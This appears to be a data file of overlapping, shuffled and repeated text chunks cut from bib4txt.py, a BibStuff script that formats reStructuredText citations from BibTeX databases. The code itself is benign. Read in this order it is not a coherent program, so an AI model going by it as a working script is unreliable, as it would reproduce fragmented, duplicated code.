"keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys.",
"to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1)",
"characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will",
"!= \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try:",
".bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity:",
"Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and",
"for a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database",
"Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX",
"sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set",
"dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False,",
"action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\",",
"default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\",",
"bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles,",
"container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now",
"reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX or bibtex).",
"(which you should have if you have this) The source text file should",
"reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an",
"citation_rank. \"\"\" #set the citation manager citekeys to all found keys (an ordered",
"return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help.",
"ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE",
"so we can make a sorted entry list. To do so need: -",
"command-line option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\"",
"the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed",
"################################################################################ ################### GLOBALS ################################################## # some globals are set when this file is",
"\"\"\" #set default input and output _infile = sys.stdin _outfile = sys.stdout from",
"mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec",
"reference list is added to the end of the file. A slight modification",
"list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of References",
"bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for reStructuredText documents.",
"citation references from the input document. - Outputs a sorted list of citation",
"bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it",
"BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`:",
"import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try:",
"store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store",
"Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or",
"format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an underscore.",
"in your reST document with an ``include`` directive. How it works: - Uses",
"it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string,",
"dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently",
") return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for",
"Roughly: a citation key enclosed in brackets, followed by an underscore. Citation keys",
"src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and the",
"<filename>scripts/bib4txt.py #!/usr/bin/env python # bib4txt.py \"\"\" Creates formatted references for a text document.",
"It is also associated with citation_manager which holds the bibliography, so we can",
"= os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ###################",
"Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY!",
"(See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document. -",
") def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default",
"input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except",
"bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in",
"# set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module",
"into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the",
"script # style # bibfile_processor # note that the standard separator for multiple",
"= parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile",
"bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals",
"\"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile,",
"%(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version',",
"to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\",",
"= \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec",
"if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by",
"parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\",",
"processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also associated",
"open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else:",
"bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does",
"- Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you",
"reference is a comma # CITATION_SEP = ',' # set in styles/shared.py def",
"################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() !=",
"of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME>",
"without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import",
"= sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage:",
"accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if",
"the reference list is added to the end of the file. A slight",
"bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python",
"might sort entries on citation_rank. \"\"\" #set the citation manager citekeys to all",
"citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the",
"\"\"\"ABORTED because output file %s already exists: Use -n option to nuke (overwrite)",
"importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse",
"\" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a",
"= ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported",
"the reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted. E.g.,",
"The source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly:",
"bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set",
"parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor",
"help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by",
"bib4txt_logger.warn(\"use the -f option to pass a style by filename\") stylename = os.path.splitext(stylename)[0]",
"import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i",
"style\"%stylename workaround = {} #work around Python 2 exec vs Python 3 exec",
"as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if args.outfile:",
"file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher -",
"cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is",
"to be used in the References section of your documents. :author: <NAME> :date:",
"\"\"\" Creates formatted references for a text document. Uuseful for reStructuredText documents. Interacts",
".bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib",
"import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run",
"scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the",
"FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\",",
"be recognized by bib4txt. - Comma separted multiple keys are permitted in a",
"default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print",
"usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version',",
"by an underscore. Citation keys cannot be all digits. The source document can",
"library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies",
"in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by",
"the formatted references to be written to a separate file. You can then",
"and output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage",
"#TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec =",
"to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second:",
"files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted",
"using LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries",
"scanning reST files for citation references. - Uses SimpleParse_ to convert an EBNF_",
"str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2",
"= src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is",
"a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except",
"# read input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r',",
"\"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python",
"are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The",
"document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental",
") except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main():",
"you should have if you have this) The source text file should include",
"references substituted for the citation keys. In this case, the reference list is",
"scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar,",
"is run as a script # style # bibfile_processor # note that the",
"os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp",
"\".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try: with",
"convert an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's",
"refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\",",
"except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line",
"writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED",
"IMPORTS ################################################## #import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n')",
"#import a bibliography style based on `stylefile` command-line option #TODO: add error handling",
"file. A slight modification of the reStructuredText ``cite`` directive is currently allowed: -",
"are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be",
"some globals are set when this file is run as a script #",
"this file is run as a script # style # bibfile_processor # note",
"`stylefile` command-line option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename)",
"2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now",
"result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only:",
"does not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as",
"making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document",
"grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file",
"\"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1: print INFO messages;",
"exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" #",
"citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`;",
"documents. Interacts with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies:",
"src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor",
"#citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make",
"on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store",
"for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\",",
"``cite`` directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is",
"added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names:",
"not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile)",
"# create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to",
"the keys for the citations referenced - a sort-key on which to base",
"elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass",
":date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note:",
"os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS",
"in reST and will be recognized by bib4txt. - Comma separted multiple keys",
"citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager to",
"# (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager)",
"the cite keys. It is also associated with citation_manager which holds the bibliography,",
"raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest",
"ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if",
"parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\",",
"bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when",
"(by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout,",
"because output file %s already exists: Use -n option to nuke (overwrite) this",
"= make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close()",
"stylename) ) #import a bibliography style based on `stylefile` command-line option #TODO: add",
"= list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not",
"if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name",
"the end of the file. A slight modification of the reStructuredText ``cite`` directive",
"module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation manager",
"args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s",
"ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a",
"args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line option",
"input document. - Outputs a sorted list of citation definitions, to be used",
"args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It",
"base the sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank.",
"cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds",
"list of citation definitions, to be used in the References section of your",
"TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html ..",
"object for scanning reST files for citation references. - Uses SimpleParse_ to convert",
":note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address",
"the citations referenced - a sort-key on which to base the sorting :note:",
"citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process",
"not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py",
"dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set",
"intent is for the formatted references to be written to a separate file.",
"help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references",
"if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the",
"the citation references from the input document. - Outputs a sorted list of",
"sorted list of citation definitions, to be used in the References section of",
"style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \"",
"cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the",
"with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text",
"you have this) The source text file should include citation references in reStructuredText",
"default=0, help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\",",
"#set the citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys",
"= importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work",
"= args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1)",
"to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages;",
"``include`` directive. How it works: - Uses SimpleParse_ to convert an EBNF_ grammar",
"except TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile, mode='r')",
"main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input and",
"- BibStuff (which you should have if you have this) The source text",
"a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile],",
"= sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE",
"bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff",
"ImportError: #hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir",
"references to be written to a separate file. You can then include this",
"citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing #",
"referenced - a sort-key on which to base the sorting :note: Sorting is",
"INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print",
"an underscore. Citation keys cannot be all digits. The source document can be",
"is a comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string,",
"option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use",
"sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string",
"\"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile,",
"if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already",
"``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the formatted references",
"citations referenced - a sort-key on which to base the sorting :note: Sorting",
"bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib",
"entries on citation_rank. \"\"\" #set the citation manager citekeys to all found keys",
"reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\")",
"digits. The source document can be output with formatted citation references substituted for",
"on which to base the sorting :note: Sorting is style dependent---e.g., might sort",
"references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO)",
"the entire document, if desired if not citations_only: result = cite_processor.__repr__() + result",
"(default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python",
"FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib)",
"(overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile =",
"version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\",",
"__needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os,",
"help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite",
"in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is",
"an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.)",
"citation key enclosed in brackets, followed by an underscore. Citation keys cannot be",
"written to a separate file. You can then include this in your reST",
"separate file. You can then include this in your reST document with an",
"e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the formatted",
"bibfile_processor # note that the standard separator for multiple keys in one citation",
"bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if",
"= bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input",
"imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to",
"LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!)",
"citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into an object",
"dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note:",
"\"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\",",
"nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level)",
"',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style",
"databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile",
"separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not*",
"References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006",
"keys for the citations referenced - a sort-key on which to base the",
"A slight modification of the reStructuredText ``cite`` directive is currently allowed: - Most",
"for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to",
"-h for help. \"\"\" #set default input and output _infile = sys.stdin _outfile",
"cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ ==",
"convert an EBNF_ grammar into an object for scanning reST files for citation",
"os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists:",
"bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only",
"bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r')",
"be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() )",
"'\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\"",
"to pass styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename =",
"recognized by bib4txt. - Comma separted multiple keys are permitted in a cite:",
"desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds",
"FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to",
"args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not",
"default input and output _infile = sys.stdin _outfile = sys.stdout from argparse import",
"should have if you have this) The source text file should include citation",
"supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6",
"a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\",",
"process cites during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create",
"allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in",
"a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') #",
"cite keys. It is also associated with citation_manager which holds the bibliography, so",
"{} #work around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround)",
"the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor,",
"all digits. The source document can be output with formatted citation references substituted",
"The intent is for the formatted references to be written to a separate",
"processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the",
"3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\"",
